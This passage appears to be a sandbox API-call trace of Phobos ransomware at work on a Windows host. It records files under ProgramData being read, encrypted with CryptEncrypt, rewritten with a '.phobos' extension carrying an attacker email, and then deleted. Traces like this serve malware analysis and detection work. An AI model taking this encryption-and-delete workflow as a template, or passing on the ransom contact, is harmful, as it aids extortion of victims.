(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q")) returned 1 [0165.721] SetEvent (hEvent=0xe8) returned 1 [0165.721] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.721] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.722] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1053) returned 1 [0165.722] CloseHandle (hObject=0x130) returned 1 [0165.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 0x2024 [0165.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.722] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0165.722] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.723] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0165.723] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32da8) returned 1 [0165.723] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.723] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x41d, lpOverlapped=0x0) returned 1 [0165.724] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420, dwBufLen=0x420 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420) returned 1 [0165.724] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x420, lpOverlapped=0x0) returned 1 [0165.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0165.725] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0165.725] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0165.725] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.725] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0165.725] CryptDestroyKey (hKey=0xa32da8) returned 1 [0165.725] CloseHandle (hObject=0x130) returned 1 [0165.725] CloseHandle (hObject=0x17c) returned 1 [0165.726] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 1 [0165.727] SetEvent (hEvent=0xe8) returned 1 [0165.727] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.727] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.728] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=53411) returned 1 [0165.728] CloseHandle (hObject=0x17c) returned 1 [0165.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico")) returned 0x20 [0165.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.728] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.728] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.728] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.728] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=29422) returned 1 [0165.728] CloseHandle (hObject=0x17c) returned 1 [0165.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico")) returned 0x20 [0165.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.728] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.729] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.729] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.729] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=83560) returned 1 [0165.729] CloseHandle (hObject=0x17c) returned 1 [0165.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico")) returned 0x20 [0165.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.729] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.729] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.729] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.730] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=51881) returned 1 [0165.730] CloseHandle (hObject=0x17c) returned 1 [0165.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico")) returned 0x20 [0165.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.730] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.730] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=67664) returned 1 [0165.730] CloseHandle (hObject=0x17c) returned 1 [0165.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico")) returned 0x20 [0165.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.731] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.731] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=49227) returned 1 [0165.731] CloseHandle (hObject=0x17c) returned 1 [0165.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico")) returned 0x20 [0165.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.731] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.731] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=113140) returned 1 [0165.731] CloseHandle (hObject=0x17c) returned 1 [0165.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico")) returned 0x20 [0165.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.732] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.732] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=53411) returned 1 [0165.732] CloseHandle (hObject=0x17c) returned 1 [0165.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico")) returned 0x20 [0165.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.734] SetEvent (hEvent=0xe8) returned 1 [0165.735] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.735] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=58312) returned 1 [0165.735] CloseHandle (hObject=0x17c) returned 1 [0165.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico")) returned 0x20 [0165.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.735] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.736] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=60344) returned 1 [0165.736] CloseHandle (hObject=0x17c) returned 1 [0165.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico")) returned 0x20 [0165.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.736] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.736] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0165.736] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0165.737] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=57333) returned 1 [0165.737] CloseHandle (hObject=0x17c) returned 1 [0165.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico")) returned 0x20 [0165.737] GetFileAttributesW 